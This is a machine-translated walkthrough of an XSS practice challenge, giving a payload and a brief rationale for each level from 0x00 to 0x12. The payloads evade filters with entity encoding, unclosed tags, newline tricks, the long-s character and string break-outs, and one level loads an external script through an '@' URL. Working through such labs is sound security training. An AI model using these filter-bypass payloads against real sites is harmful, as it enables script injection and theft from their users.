Target address ：https://xss.haozi.me

0x00 

Unprotected

<script>alert(1)</script>

 0x01

stay <textarea> Label inside this label , All scripting languages are strings , Cannot be called to execute , Just close the label ;

</textarea><script>alert(1)</script>

 0x02

  closed " and < that will do

"><script>alert(1)</script>
aaa" onclick="alert(1)   

 0x03

Regular expressions , take  ()  Replace empty , use `` Instead, that is

<script>alert`1`</script>

0x04

Regular expressions , take  () `` Replace empty ,HTML Entity encoding &#40;&#41;

<svg><script>alert&#40;1&#41;</script>

 0x05

Here we replace with regular -->,html The annotators of are 2 Species writing ：

<!-- Content of notes -->  The other is <!-- Content of notes --!> 

--!><script>alert(1)</script>

 0x06

The canonical substitution here is auto and on.*= and > character , So I filtered js Of autofocus Events and on The first event ;

But there is no filter line feed , Sure utilize HTML Fault tolerance mechanism of , As long as the keywords and syntax are correct , Features unaffected by spaces and newlines

onclick
=alert(1)

onmousedown
=alert(1)

type=image src=1 onerror
=alert(1)

 0x07

  Regular  <\/?[^>]+>  This pile , With "<"  start ">" The ending is interspersed with non ">" Case insensitive string of ,

in general , Just replace </  Any character  > It's empty . use <svg Labels and THTML Fault tolerant mechanism does not write ">" that will do

<svg onload=alert(1)//

<svg onload=alert(1)\n

<img src=1 onerror="alert(1)"

0x08 

Regular filtering </style>, Make it impossible to close ;

and 6 7 The questions are similar to , Or use HTML Fault tolerance for </style Followed by a space or enter

</style ><script>alert(1)</script>

</style
><script>alert(1)</script>

0x09

Use regular rules to specify that the input string must have https://www.segmentfault.com1;

Then write it later ," closed ></script> closed , And then note out ">

https://www.segmentfault.com1"></script><script>alert(1)//

 0x0A 

Similar to the previous question , Another one ' " < > / It's all filtered

Use in the middle of the website @ Symbol , Redirect to @ The following fields URL;（ Google seems to have a protection mechanism , Try it on Firefox ）

https://[email protected]/j.js

0x0B

Lose ⼊ All strings of are converted ⼤ Yes ;

html Case insensitive ,JS Case sensitive ;

use <svg οnlοad=alert(1)>, Yes 'alert' Entity encoding ;

<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>

 0x0C

It's similar to the last question , Just one more pair script The filter ;

If you use <script>, Double write ;

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

<sscriptcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></sscriptcript>

 0x0D

  Regular filtering  < / " ' , Don't have to ;

Enter escape single line notes , Add the extra ‘）

 Return here 
alert(1)
-->

0x0E 

The regular match here <a-zA-Z>, give back < Add... To the back _,  And capitalize , This filters almost all tags ;

So we need to use a strange skill ： There is such a character  ſ , It will become S;

<ſcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></script>

<ſvg onload=&#97;&#108;&#101;&#114;&#116;(1)>

 0x0F

This is similar to question 10 , take & ' " <> /  to HTML Entity code ;

But here's the thing , The character we entered is still in html in , Therefore, even if it is encoded, its function can be performed ;

Before and after closing (' ') Or note out that will do ;

');alert(1);('

 0x10

Unprotected , to data Just a value ;

');alert(1);('

 0x11

and 15 Same question , hold / ’ " ` < > \ And line breaks are escaped ;

Before and after closing (" ") that will do ;

stay JS Right in the code / The escape of is actually superfluous , In practical use ,/ Not a special symbol , No escape required , It can output directly

");alert(1);("

");alert(1);//

0x12

take " It's escaped ;

Why do I need double quotation marks , Directly close the front <script>, Then put the back ')  Inject it out that will do ;

It's fine too take  \ To escape , Let it fail , Then close (" 

</script><script>alert(1)//

a\");alert(1);//

 ok Get it done ！ Personal habits are different , The answer is not unique , If there are different solutions , Welcome to share ！